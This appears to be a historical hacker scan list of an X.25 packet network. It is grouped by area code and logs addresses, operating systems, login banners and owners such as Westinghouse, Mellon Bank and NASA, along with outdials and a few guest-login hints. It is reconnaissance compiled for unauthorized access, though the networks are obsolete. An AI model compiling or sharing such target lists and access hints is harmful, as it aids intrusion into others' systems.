+301 351    Prime       Primecom Network 19.4Q.111 System 95
+301 352    Prime       Primecom Network 19.4Q.111 System 52
+301 353    Prime       Primecom Network 19.4Q.111 System 53
+301 356    Prime       Primecom Network 18.4Y System 56
+301 357    Prime       Primecom Network 19.4Q.111 System 57
+301 358    Prime       Primecom Network 19.4Q.111 System 58
+301 361    Prime       Primecom Network 19.4Q.111 System 31
+301 364    Prime       Primecom Network 19.4Q.111 System 64
+301 390    Prime       Primecom Network 19.4Q.111 System 90
+301 391    Prime       Primecom Network 19.4Q.111 System 91
+301 392    Prime       Primecom Network 19.4Q.111 System 92
+301 393    Prime       Primecom Network 19.4Q.111 System 93
+301 394    Prime       Primecom Network 19.4Q.111 System 30
+301 395    Prime       Primecom Network 19.4Q.111 System 95
+301 396    Prime       Primecom Network 19.4Q.111 System 96
+301 397    Prime       Primecom Network 19.4Q.111 System 97
+301 398    Prime       Primecom Network 19.4Q.111 System 98
+301 441  *
+301 442  *
+301 443  *
+301 444  *
+301 447  *
+301 448  *
+301 449  *
+301 450  *
+301 455    Unix SysV   oldabacis login: (uucp)
+301 521  $             NETX A000VD03 READY FOR LOGON
+301 530                PLEASE ENTER  LOGIN
+301 535A
+301 546  *
+301 548 
+301 558  *
+301 559  *
+301 560  *
+301 563  $ VM/CMS?     INVALID-SW-CHARS 
+301 565    Unix        E.T.Net/The National Library of Medicine. 
+301 1130 
+301 1131
+301 1134 *
+301 1136 *
+301 1139               8001A69E
+301 1142               9769AFC6
+301 1153 *
+301 1230               You are not authorized to connect to this machine.
+301 1241               Fannie Mae
+301 1243               USER ID 
+301 1244 *
+301 1245 *
+301 1253 *
+301 1551 *
+301 2040 *
+301 2042 *
+ 
+ 
+ 
+ 
+302  -  Delaware  Scanned: 0 - 300     
+ 
+ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
+---------- ----------- -------------------------------------------------
+302 41   $             (running same/similar software as tymnet)
+ 
+ 
+ 
+ 
+303  -  Colorado  Scanned: 0 - 1000     
+ 
+ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
+---------- ----------- -------------------------------------------------
+303 21   $             outdial (303)
+303 33                 Password > 
+303 47   *
+303 114  $             outdial (303)
+303 115  $             outdial (303)
+303 120    Prime       PRIMENET 22.1.3.R35 SAMSON
+303 140                X29 Password: 
+303 141  *
+303 142  *
+303 242  $ VAX/VMS     AZTEK Engineering MicroVAX (AZTKD1)
+303 268  *
+303 330  *
+303 333  *
+303 338  *
+303 561    Prime       PRIMENET 22.1.1.R11 SPARKY
+303 579    Prime       PRIMENET 22.1.3.R35 CAESAR
+303 800  *
+ 
+ 
+ 
+ 
+304  -  West Virginia  Scanned: [0 - 300]      
+ 
+ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
+---------- ----------- ------------------------------------------------- 
+304 101                ENTER: ASV2, ASV3 OR MPL780
+304 130                ENTER: ASV2, ASV3 OR MPL780
+ 
+ 
+ 
+ 
+305  -  Florida  Scanned: 0 - 2000
+ 
+ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
+---------- ----------- -------------------------------------------------
+305 4                  USER ID 
+305 34                 USER ID   
+305 59                 .INVALID COMMAND
+305 105  $             outdial (305)
+305 106  $             outdial (305)
+305 120  $             outdial (305)
+305 121  $             outdial (305)
+305 122  $             outdial (305)
+305 135  *
+305 140                .INVALID COMMAND
+305 141                Select Desired System:
+305 142                USER ID 
+305 145                USER ID
+305 149    hp-x000     S901.NET.BUC
+305 150  *
+305 156                USER ID
+305 162                WN01000000000000000000000000000
+305 170  *
+305 171    VM/CMS?     ENTER SWITCH CHARACTERS
+305 172                WN01000000000000000000000000000
+305 175                USER ID
+305 177                WN01000000000000000000000000000
+305 178    hp-x000     S901.NET.BUC
+305 237                Comcast Information Services
+305 241                WN01000000000000000000000000000
+305 245  *
+305 247
+305 250    Unix 
+305 339                CONNECTED TO PACKET/74
+305 347                CONNECTED TO PACKET/74
+305 362                CLARIONET  Userid :  new
+305 363                CLARIONET
+305 364                CLARIONET
+305 365                CLARIONET
+305 366                CLARIONET
+305 370  $
+305 371    VAX/VMS     Usuario :
+305 372  $ VAX/VMS     ORL001  
+305 471 
+305 472  $ HP-3000     MIA.MIA.EI 
+305 700 
+305 1036               CONNECTED TO PACKET/74
+305 1037               CONNECTED TO PACKET/74
+305 1043   Unix        
+305 1040               USER ID 
+305 1242   AOS         
+305 1243 *
+305 1244   Prime       PRIMENET 22.1.3 DZ-MIA
+ 
+ 
+ 
+ 
+309  -  Illinois  Scanned: [0 - 200]     
+ 
+ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
+---------- ----------- ------------------------------------------------- 
+309 30   *
+ 
+ 
+ 
+ 
+312  -  Illinois  Scanned: [0 - 1500]
+ 
+ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
+---------- ----------- ------------------------------------------------- 
+312 34                 YOUR ENTRY IS INCORRECT.
+312 35   $ TSO
+312 37   *
+312 40 
+312 41                 YOUR ENTRY IS INCORRECT.
+312 45                 YOUR ENTRY IS INCORRECT.
+312 53     TSO         COMMAND UNRECOGNIZED
+312 54     TSO
+312 59                 Id Please: 
+312 64   $             Purdue Annex  (*.cc.purdue.edu)
+312 65   $             MSG 1: COMMAND INVALID FROM PHTIB010
+312 74   *
+312 75   *
+312 77   $             USER ID
+312 78   $             USER ID
+312 121                enter system id -- 
+312 125  *
+312 131    VM/CMS      SYSTEMV 
+312 150                PLEASE ENTER SUBSCRIBERID;PASSWORD
+312 159                PLEASE ENTER SUBSCRIBERID;PASSWORD
+312 160                USERID: 
+312 170  $ VAX/VMS     This is SKMIC4 - Authorized use only
+312 233                USERID:
+312 235
+312 240  *
+312 245  *
+312 253  *
+312 254  *
+312 256                PLEASE LOGIN
+312 257  *
+312 258                ID:
+312 269                CUSTOMER ID: 
+312 270                CUSTOMER ID: 
+312 271                CUSTOMER ID: 
+312 350  *
+312 351    TSO           
+312 354  *
+312 378                BAXTER ASAP SYSTEM (LINE EG75)
+312 379    TSO
+312 398  $             MHP201A ITVI0180  * VERSION 6.0.2 *.
+312 400                BAXTER ASAP SYSTEM (LINE EGC7) 
+312 401                BAXTER ASAP SYSTEM (LINE EG4D)   
+312 402                BAXTER ASAP SYSTEM (LINE EGC5)
+312 403    TSO
+312 405    TSO
+312 410  $             outdial (312)
+312 411  $             outdial (312)
+312 451    TSO
+312 452                BAXTER ASAP SYSTEM (LINE EGED)
+312 475  *
+312 476  *
+312 477  $             USER ID
+312 520    Unix        R59X01 login: 
+312 521    Unix        R58X01 login: 
+312 522    Unix        R67X01 login:
+312 524    Unix        R51X01 login: 
+312 525    Unix        R41X01 login: 
+312 526                PASSWORD
+312 528                PASSWORD
+312 530  *
+312 531  *
+312 532  $ VAX/VMS
+312 533  *
+312 534  $             (echo)
+312 535  $             (echo)
+312 536  $             (echo)
+312 537  $             (echo)
+312 538  $             (echo)
+312 585  *
+312 587  *
+312 588  *
+312 589  *
+312 655    TSO
+312 740                TELENET ASYNC TO 3270 SERVICE 
+312 762  *
+312 763  *
+312 764  *
+312 765  *
+312 766  *
+312 767  *
+312 768  *
+312 769  *
+312 770  $             TELENET ASYNC TO 3270 SERVICE 
+312 772  $             TELENET ASYNC TO 3270 SERVICE AB-NET 
+312 1130   Unix        R52X01 login: 
+312 1131   Unix        R61X01 login: 
+312 1132   Unix        R63X01 login:
+312 1133   Unix        R40X01 login:
+312 1134   Unix        R43X01 login:
+312 1135   Unix        R46X01 login: 
+312 1139   Unix        R65X01 login: 
+312 1140   Unix        R54X01 login: 
+312 1141   Unix        R71X01 login: 
+312 1142   Unix        R56X01 login:
+312 1143   Unix        R55X01 login:
+312 1144   Unix        R48X01 login: 
+312 1150   Unix        R47X01 login:
+312 1151   Unix        R62X01 login: 
+312 1152   Unix        R45X01 login:
+312 1153   Unix        R42X01 login: 
+312 1154   Unix        R74X01 login: 
+312 1155   Unix        R60X01 login: 
+312 1177 *
+312 1179 *
+312 1232               REQUEST IN VIOLATION OF SYSTEM SECURITY STANDARDS 
+312 1233               REQUEST IN VIOLATION OF SYSTEM SECURITY STANDARDS     
+312 1250               YOUR ENTRY IS INCORRECT.
+312 1251               YOUR ENTRY IS INCORRECT.
+312 1258   Prime       PRIMENET 23.2.0.r26 HS6650
+312 1259               ENTER ID   (Westlaw)
+312 1270 *
+312 1271 *
+312 1272 *
+312 1275 *
+312 1301               MHP201A A00B1001  * VERSION 5.5.3 *.
+312 1302               MHP201A A00B1101  * VERSION 5.5.3 *.
+312 1303               MHP201A A00B1101  * VERSION 5.5.3 *.
+312 1304               MHP201A A00B1101  * VERSION 5.5.3 *.
+312 1305               MHP201A A00B1101  * VERSION 5.5.3 *. 
+312 1306               MHP201A A00B1101  * VERSION 5.5.3 *. 
+312 1307               MHP201A A00B1101  * VERSION 5.5.3 *.
+312 1308               MHP201A A00B1101  * VERSION 5.5.3 *. 
+312 1309               MHP201A A00B1101  * VERSION 5.5.3 *.
+312 1310               MHP201A A00B1101  * VERSION 5.5.3 *.  
+312 1311               MHP201A A00B1101  * VERSION 5.5.3 *. 
+312 1340 *
+312 1341               ENTER ID   (Westlaw)
+312 1534 *
+312 1535 *
+ 
+ 
+ 
+ 
+313  -  Michigan  Scanned: [0 - 2000]      
+ 
+ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
+---------- ----------- ------------------------------------------------- 
+313 24   $             outdial (313)
+313 40                 Autonet Line 3130095084  
+313 41                 Autonet Line 3130095084
+313 62                 Merit:X.25 Gateway
+313 75   *
+313 82                 Enter "CMS userid", "TSO userid ", "SIMVTAM termid"
+312 219                enter system id -- 
+313 101  $             outdial (313)
+313 111  $             outdial (313)
+313 140  $             USER ID
+313 144  $ DTC         DTCHQ02.WD.WD            
+313 145                Please enter your Access Code ? 
+313 146                Please enter your Access Code ?
+313 148                PLEASE ENTER SUBSCRIBERID;PASSWORD
+313 152    Unix/SunOS  SPRINT.COM SunLink X.29 service
+313 153                MHP1201I TERMINAL CONNECTED TO PACKET/74
+313 160                PASSWORD (this will hang you up)
+313 164                VU/TEXT
+313 165  *
+313 171                U#=
+313 173    VAX/VMS     IPP VAX/VMS V5.4-3 SYSTEM VIP012
+313 202                Merit:X.25 Gateway
+313 214  $             outdial (313)
+313 216  $             outdial (313)
+313 239    Unix        Valenite
+313 250    HP-3000
+313 330  $ Unix        Domino's Pizza Distribution Corp 
+313 350  *
+313 351  *
+313 352  *
+313 353  *
+313 354  *
+313 355  *
+313 365    Unix/SunOS  This is our latest and greatest X.29 service
+313 705    OS4000 5.5  Logging in  user
+313 800    Prime       PRIMENET 22.1.4.R39v D1D2  
+313 1020               USER ID   
+313 1021               USER ID   
+313 1032 *
+313 1162   Unix        R44X01 login:
+313 1163   Unix        R69X01 login: 
+313 1164   Unix        R50X01 login: 
+313 1165   Unix        R57X01 login:
+313 1166   Unix        R64X01 login:
+313 1167   Unix        R66X01 login:
+313 1169   Unix        R70X01 login:
+313 1170   Unix        R73X01 login:
+313 1171   Unix        R75X01 login:
+313 1172   Unix        R72X01 login: 
+313 1174   Unix        R77X01 login: 
+313 1175   Unix/SysV   (jupiter)
+313 1176   Unix        aries login: 
+313 1177   Unix        hermes login: 
+ 
+ 
+ 
+ 
+314  -  Missouri  Scanned: [0 - 300]      
+ 
+ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
+---------- ----------- ------------------------------------------------- 
+314 139  *
+314 143  $ ???         Please log in (or type "/DOC/DEMO").
+314 260 
+ 
+ 
+ 
+ 
+315  -  New York  Scanned: [0 - 300]      
+ 
+ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
+---------- ----------- ------------------------------------------------- 
+315 20                 (echo)
+315 32   $             COMMAND UNRECOGNIZED
+315 50   $ SIM3278
+315 135                (echo)
+315 136                (echo)
+315 137  $             GTE CAMILLUS NY
+315 138                CONNECTED TO PACKET/94
+315 145    VAX/VMS     Username:
+315 149  $             GTE CAMILLUS NY 
+315 150                GTE CAMILLUS NY 
+315 151                GTE CAMILLUS NY 
+315 152                (echo)
+315 162                CONNECTED TO PACKET/400
+315 172  *
+315 231 
+ 
+ 
+ 
+ 
+317  -  Indiana  Scanned: [0 - 300]      
+ 
+ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
+---------- ----------- ------------------------------------------------- 
+317 55   $             outdial (317)
+317 113  $             outdial (317)
+317 114  $             outdial (317)
+317 127    VTAM/M02
+317 134  $ Prime       PRIMENET 22.0.4.R8 PENTEK
+317 136  *
+317 140    VAX/VMS
+317 142  *
+317 143  $             (hangs up)
+317 145    Prime       PRIMENET 22.1.3 ARVN01
+317 148                USER ID
+317 154    VAX/VMS
+317 157  *
+317 159  *
+317 164  $             (hangs up)
+317 174                
+317 235  $             CONNECTED TO PACKET/74 
+317 251                CONNECTED TO PACKET/400
+317 253  *
+317 255 
+317 260    Unix        SIL_CHI
+317 299                ASYNC to whatever -- (try logical unit=9)
+317 335    VAX/VMS
+317 336  *
+ 
+ 
+ 
+ 
+321  -  SPAN/NASA  Scanned: [N/A]
+ 
+ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
+---------- ----------- ------------------------------------------------- 
+321        Note: Access to SPAN now passes through a network
+                 validation gateway. I was unable to get passed
+                 this, and unable to scan this prefix. 
+                 Here is the friendly message you get on attempts:
+ 
+                 Entering the NASA Packet Switching System (NPSS)
+                 Please Report Service Access Problems To (205) 544-1771
+ 
+                 <insert large warning banner>
+ 
+                 USERID>   
+                 PASSWORD> 
+                 SERVICE>  
+ 
+ 
+ 
+ 
+401  -  Rhode Island  Scanned: [0 - 300]     
+ 
+ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
+---------- ----------- ------------------------------------------------- 
+401 50   *
+401 230  *
+ 
+ 
+ 
+ 
+402  -  Nebraska  Scanned: [0 - 300]      
+ 
+ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
+---------- ----------- ------------------------------------------------- 
+402 47 
+402 57     Unix        NCR 386/486  System name: tower12
+402 131  *
+402 231  *
+ 
+ 
+ 
+ 
+404  -  Georgia  Scanned: [0-700]      
+ 
+ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
+---------- ----------- ------------------------------------------------- 
+404 55   *
+404 57
+404 59 
+404 70
+404 77 
+404 79 
+404 143 
+404 171
+404 235.1  Port Selec  The Journal Of Commerce
+404 235.2  VAX/VMS     Nedlloyd Lines Region Management North America
+404 244
+404 247 
+404 250.1              CUSTOMER ID:
+404 250.2              (garbage)
+404 251.1              CUSTOMER ID:
+404 252.1              CUSTOMER ID: 
+404 262.2              TACL 1> 
+404 263.2              TACL 1> 
+404 264.2              TACL 1> 
+404 265.2              TACL 1> 
+404 266.2              TACL 1> 
+404 349    Prime       PRIMENET 22.1.3 EHPATL
+404 358
+404 359
+404 372    VOS
+404 373    VOS
+404 374  * 
+404 560    VAX/VMS
+404 633    VAX/VMS
+404 635    VAX/VMS
+ 
+ 
+ 
+ 
+405  -  Oklahoma  Scanned: [0 - 300]     
+ 
+ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
+---------- ----------- ------------------------------------------------- 
+405 45                 ENTER SESSION ESTABLISHMENT REQUEST : 
+405 46                 TACL 1>
+405 130  *
+405 242    VAX/VMS
+405 245  *
+405 246
+405 248  *
+405 249  *
+ 
+ 
+ 
+ 
+408  -  California  Scanned: [0 - 1500]      
+ 
+ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
+---------- ----------- ------------------------------------------------- 
+408 21   $             outdial (408)
+408 31   *
+408 45   $ HP-3000     SPECTRA-PHYSICS  LASERS  
+408 49   *
+408 61 
+408 77   $             USER ID
+408 110  $             outdial (408)
+408 111  $             outdial (408)
+408 121    HP-3000     SAGAN.HP.COM
+408 127    Unix
+408 133  $             (echo)
+408 159  $ VAX/VMS
+408 177  *
+408 235    AOS         GLOBAL WEATHER MV3
+408 238    Unix        
+408 260  *
+408 261  *
+408 264                Portal Communications Company. NEW/INFO/HELP
+408 267  *
+408 268  *
+408 271 
+408 273 
+408 335    VAX/VMS     CONNECTING TO NODE: LTCTST
+408 342  $ Unix/SunOS  (OSI)
+408 343  $ VTAM        Amdahl Corporate Computer Network
+408 344  $ VAX/VMS     ANDO running VMS V5.4-2
+408 346    Unix        IGC Networks   login:new  password:<cr>
+408 352  $ VTAM        Amdahl Corporate Computer Network  
+408 356  *
+408 357  *
+408 378    Unix        X.25 PAD  (pad echo)
+408 450    Unix        HP-UX moe 
+408 444  $ HP-3000     Finnigan Corporation  
+408 445  $ VAX/VMS     GEC PLESSEY Semiconductors 
+408 449    VAX/VMS     Friden Neopost (Node: PRDSYS)
+408 450    Unix        HP-UX moe 
+408 456  *
+408 530  *
+408 531  *
+408 532  *
+408 534  $ DTC         DTC02.DOMAIN.ORGANIZATION
+408 539                User Access Verification Password: 
+408 1050 
+408 1046 *
+408 1050 
+408 1051 
+408 1052 
+408 1053 
+408 1054   Port Selec  First Image
+408 1055 
+408 1060 $             REQUESTED APPLICATION NOT DEFINED
+408 1061 $             REQUESTED APPLICATION NOT DEFINED 
+408 1062 $             REQUESTED APPLICATION NOT DEFINED 
+408 1063 $             REQUESTED APPLICATION NOT DEFINED
+408 1064 $             REQUESTED APPLICATION NOT DEFINED 
+408 1065 $             REQUESTED APPLICATION NOT DEFINED
+408 1066 $             REQUESTED APPLICATION NOT DEFINED 
+408 1067 $             REQUESTED APPLICATION NOT DEFINED
+408 1068 $             REQUESTED APPLICATION NOT DEFINED
+408 1069 $             REQUESTED APPLICATION NOT DEFINED 
+408 1071 $             (echo)
+408 1072 $             (echo)
+408 1076 $             (echo)
+408 1230 $             (echo)
+408 1231 $             (echo)
+408 1234 $             (echo)
+408 1235 $             (echo)
+408 1238 *
+408 1240 $             (hangs up)
+408 1350   VAX/VMS
+ 
+ 
+ 
+ 
+410  - RCA? MCI?  Scanned: [0-300+]
+ 
+ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
+---------- ----------- ------------------------------------------------- 
+410 0                  MCI  YR ID?
+ 
+ 
+ 
+ 
+412  -  Pennsylvania  Scanned: [0 - 1000]
+ 
+ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
+---------- ----------- ------------------------------------------------- 
+412 30                 USER ID   
+412 33     VAX/VMS     Lender's Service, Inc. Computer System
+412 34   $ ACF/VTAM    Lord Corp IBM Network
+412 51                 *** ENTER LOGON
+412 52                 *** ENTER LOGON
+412 55                 COMMAND UNRECOGNIZED
+412 60                 PC2LAN Connected to Router Pit
+412 61                 %@CVTTAUD@dUYECVGUIiED
+412 63                 %@CVTTAUD@dUYECVGUIiED
+412 67     SIM3278     Mellon Bank
+412 70   *
+412 78                 # 
+412 79                 # 
+412 130 
+412 153                *** ENTER LOGON
+412 201  $             outdial (412)
+412 202  $             outdial (412)
+412 230    VAX/VMS     You are connected to a private system.
+412 231  $ Prime       PRIMENET 22.1.3.r13 MECO
+412 335  *
+412 336                Renex Connect, SN-00300371
+412 340    SIM3278     Mellon Bank
+412 342                COMMAND UNRECOGNIZED FOR T11310T0
+412 349                *** ENTER LOGON
+412 352                *** ENTER LOGON
+412 440    Unix/SysV   X.29 Terminal Service (dxi-m1)          
+412 708    Unix/SysV   X.29 Terminal Service (dxi-m1)
+ 
+ 
+ 
+ 
+414  -  Wisconsin  Scanned: [0 - 300]
+ 
+ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
+---------- ----------- ------------------------------------------------- 
+414 20   $             outdial (414)
+414 21   $             outdial (414)
+414 36   *
+414 46   $ Prime       PRIMENET 22.1.4-SC1 SYSU
+414 49                 CONNECTED TO MMISC 
+414 60                 User Name?   (MGIC)
+414 120  $             outdial (414)
+414 165                USER ID   
+414 170  *
+414 241  *
+414 242  *
+ 
+ 
+ 
+ 
+415  -  California  Scanned: [0 - 1500]
+ 
+ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
+---------- ----------- -------------------------------------------------
+415 5    $             outdial (415)
+415 7      HP-3000     EXPECTED HELLO, :JOB, :DATA, OR (CMD) AS LOGON.
+415 11   $             outdial (415)
+415 20                 Dialog Information Services
+415 23   $             outdial (415)
+415 27                 Stanford Data Center (SYSA), Forsythe Hall.
+415 29A                Stanford University Hospital System (SUH/SYSC).
+415 31                 You are not authorized to connect to this system
+415 35                 (echo)
+415 38                 DTC04.LSI.NET 
+415 48                 Dialog Information Services
+415 49                 Dialog Information Services
+415 53B    VAX/VMS     Username:
+415 54                 USER ID 
+415 56                 CONNECTED TO PACKET/74
+415 68A    VAX/VMS     Username:
+415 74   *
+415 108  $             outdial (415)
+415 109  $             outdial (415)
+415 131  $ HP-3000
+415 153                CONNECTED TO PACKET/94
+415 165  *
+415 167    Prime       PRIMENET 22.1.3 VESTEK
+415 168    Unix        Vestek
+415 174  *
+415 175                Dialog Information Services
+415 215  $             outdial (415)
+415 216  $             outdial (415)
+415 217  $             outdial (415)
+415 224  $             outdial (414)
+415 232    Unix        pandora
+415 234  $ Unix        UNIX System V Release 1.0-92b011 AT&T MIServer-S
+415 475    Prime       PRIMENET 22.1.3.R21 CORP.1
+415 476  *
+415 569    DACS        
+415 1030   Prime
+415 1052 *
+415 1053   HP-3000
+415 1057 $ VAX/VMS     
+415 1069 *
+415 1252 *
+415 1255 $ DTC         ERROR: User not authorized
+415 1262 $ ???         ???
+415 1268               TACL 1> 
+415 1269               TACL 1> 
+415 1356 *
+415 1357 *
+415 1600               USER ID   
+ 
+ 
+ 
+ 
+422  -  Westinghouse  Scanned: various      
+ 
+ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
+---------- ----------- ------------------------------------------------- 
+422 101.1              ENTER PASSWORD
+422 104    DTC         Type 'H' or '?' for HELP
+422 105                CONNECTED TO PACKET/74
+422 106    GS/1        FASD >
+422 115                Westinghouse X.25 Network  WCIS Gandalf pad 422115
+422 122 
+422 123    VM/XA       Westinghouse Corporate Computer Services
+422 129                COMMTEX Cx-80 DATA EXCHANGE 
+422 131.1  annex       tcc_inn>   
+422 131.2              >
+422 131.3
+422 131.4              Network Access DSU/CSU  (menu driven need vt100)
+422 131.5              uGn
+422 131.6
+422 131.7              MJgsonnesvev>3=9>722>?=3=>7/3=9>7?=????7
+422 135.5
+422 135.6  annex       tcc_hub>
+422 135.7              ** USER NOT LOGGED ON
+422 135.10             ** USER NOT LOGGED ON
+422 135.20 annex       tcc_hub>
+422 135.30 
+422 137.1  annex       credit>
+422 137.4
+422 137.5  ???         <         (try '?')
+422 137.9  annex       credit1>  
+422 138                Select Destination:    
+422 139    VM/XA       Westinghouse Corporate Computer Services 
+422 150 
+422 154 
+422 165
+422 166 
+422 167 
+422 168
+422 169 
+422 180                WESTINGHOUSE SNA NETWORK - ENTER: L APPLNAME
+422 181                WESTINGHOUSE SNA NETWORK - ENTER: L APPLNAME
+422 183                MHP1201I TERMINAL CONNECTED TO PACKET/74
+422 184                MHP1201I TERMINAL CONNECTED TO PACKET/74
+422 185                MHP1201I TERMINAL CONNECTED TO PACKET/74
+422 187                MHP1201I TERMINAL CONNECTED TO PACKET/74
+422 237 
+422 240 
+422 244                WESPAC/ENTER PASSWORD
+422 252 
+422 254.6              Westinghouse X.25 Network /  Tech Control  422254
+422 254.8              (drops to dos?)
+422 255    VM/???      WESCO INFORMATION SYSTEMS
+422 310    VAX/VMS     
+422 311
+422 340 
+422 346 
+422 365 
+422 375 
+422 376    AOS         Westinghouse Corporate Information Services  
+422 381                TACL 1> 
+422 390
+422 401    AOS 
+422 405    AOS 
+422 409    AOS 
+422 410    AOS 
+422 412    AOS 
+422 413    AOS 
+422 416    AOS 
+422 424    AOS 
+422 431    AOS 
+422 440    AOS 
+422 443    AOS 
+422 450.2              RM > 
+422 450.3              CDS > 
+422 450.4              CDS > 
+422 450.5              (beep!)
+422 450.6              CDS > 
+422 450.7              CDS > 
+422 450.8              RM > 
+422 450.9              CDS > 
+422 450.10             CDS > 
+422 450.11             CDS > 
+422 454 
+422 493    AOS 
+422 494                Westinghouse ESCC    IBM C-80 System B Access
+422 495                Westinghouse ESCC    IBM C-80 System B Access
+422 496                Westinghouse ESCC    IBM C-80 System B Access
+422 497                Westinghouse ESCC    IBM C-80 System A Access
+422 501    AOS 
+422 502    TSO         pci protocol converter    please logon pad 502
+422 504.9              ESCC CCU PAD 504  - PLEASE ENTER PASSWORD  
+422 508                Westinghouse Power Generation World Headquarters
+422 511    AOS 
+422 514    AOS 
+422 517    AOS 
+422 519                Westinghouse X.25 Network   Lima, OH pad 422519
+422 522    AOS
+422 525    AOS
+422 527    AOS         Nuclear Saftey
+422 535    AOS
+422 539    AOS
+422 541    AOS
+422 544.2              RM > 
+422 545    AOS
+422 547    VAX/VMS     
+422 555    AOS
+422 558                Westinghouse X.25 Network    Orrville, OH pad p558
+422 559    AOS
+422 571    AOS
+422 577    AOS
+422 609    AOS
+422 601    Unix/SunOS
+422 602    AOS
+422 606                Carpenter Technology's Network  
+422 608    AOS
+422 609    AOS
+422 613    AOS
+422 614 
+422 616    AOS
+422 623    AOS
+422 631    AOS
+422 636                Wesmark System
+422 637    AOS
+422 645    AOS
+422 649    AOS
+422 651    AOS
+422 656                Wesmark System
+422 657    AOS
+422 659    AOS
+422 660    AOS
+422 669    AOS
+422 674    AOS
+422 694                IBM 7171 Access   please hit the ENTER key
+422 695                Westinghouse ESCC   IBM C-80 System G Access
+422 696                Westinghouse ESCC   IBM C-80 System F Access
+422 697                Westinghouse ESCC   IBM C-80 System E Access
+422 698                Westinghouse ESCC   IBM C-80 System D Access
+422 702                (garbage)
+422 999                WCCS Figures Service
+422 1200.99            Username: 
+422 1205               ****POSSIBLE DATA LOSS 00 00****
+422 1207               password: 
+422 1208.1             Westinghouse X.25 Network  BALTIMORE, MD.
+422 1215 
+422 1305   AOS
+422 1304.1             Westinghouse X.25 Network  Ft. Payne, AL pad 1304a
+422 1305   AOS
+422 1312.1             Westinghouse X.25 Network  Winston-Salem, NC pad 1312-1
+422 1317   AOS
+422 1319
+422 1320   AOS
+422 1322   AOS
+422 1396   VAX/VMS
+422 1398   VAX/VMS
+422 1405 
+422 1420   VAX/VMS     COFVIL - APTUS Coffeyville system
+422 1512               Please enter service name >   (use 'wespac')
+422 1720 
+422 1719 
+422 1720 
+422 1722               (menu driven...)
+422 1724 
+422 1759               (menu driven...)
+422 1760 
+422 1791 
+422 1792
+422 1793 
+422 1794 
+422 1840.2 Prime       Primecom Network 19.4Q.111 System 47
+422 1852               Knutsford PAD 1
+422 1855               Stansted Delta PAD  Operator:
+422 1860.1
+422 1862
+422 1884.1             >
+422 1890.1             London, UK PAD 4221890
+422 1901.2 $           Westinghouse EURO.SWITCH.NETWORK - WNI -BRUSSEL
+422 1907   $           WESPAC PAD 4
+422 1917   $           WESPAC PAD 3
+422 3101.1             Class of Service: 
+422 3201   AOS
+422 3202   AOS
+422 3203   AOS
+422 3204   AOS
+422 3208 
+422 3209 
+422 3210 
+422 3211 
+422 3212 
+422 3213   AOS
+422 3214               SmartView NetWork Management System
+422 3219   AOS
+422 3221   AOS
+422 3222 
+422 3223 
+422 3228   AOS
+422 3230 
+422 3231
+422 3233.1
+422 3234 
+422 3235   AOS
+422 3236               VISTA BATCH    User ID?
+422 3252   AOS
+422 3253   AOS
+422 3254   AOS
+422 3255   AOS
+422 3258 
+422 3259 
+422 3260
+422 3261
+422 3361 
+422 3362 
+422 3363 
+422 3401   TSO         MIS Computer Centre
+422 3403   Port Select MIS Computer Center
+422 3503   VAX/VMS     
+422 3601               Westinghouse X.25 Network  O' Hara Site pad 4223601
+422 3602   VAX/VMS
+422 3701   VAX/VMS
+422 3703   CDCNET      2 systems: SN211=CRAY, NOSF=Cyber
+422 3704   CDCNET 
+422 3705   CDCNET
+422 3753 
+422 3804
+422 3805
+422 3806
+422 3807 
+422 3842.1             Jones Day Washington Office
+422 3860.2             Jones Day Pittsburgh Office
+422 3902               enter class 
+422 3904   VAX/VMS
+422 5021
+422 5039 
+422 5037               connected 31104220503700/
+422 5043 
+422 5044
+422 5052   VAX/VMS
+422 5053   VAX/VMS
+422 5060
+422 5082
+422 6002 
+422 6011 
+
+501  -  Arkansas  Scanned: [0 - 300]      
+ 
+ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
+---------- ----------- ------------------------------------------------- 
+501 130  *
+501 131  *
+501 133 
+ 
+ 
+ 
+ 
+502  -  Kentucky  Scanned: [0 - 300]      
+ 
+ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
+---------- ----------- ------------------------------------------------- 
+502 74     VAX/VMS     Username: 
+502 75     VAX/VMS     Username: 
+502 130    ???         B&W Corporate Computer System
+502 136                CONNECTED TO PACKET/94
+502 138  *
+ 
+ 
+ 
+ 
+503  -  Oregon  Scanned: [0 - 500]      
+ 
+ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
+---------- ----------- ------------------------------------------------- 
+503 20   $             outdial (503)
+503 21   $             outdial (503)
+503 33     Major BBS   Public Data Network   User-ID? new  
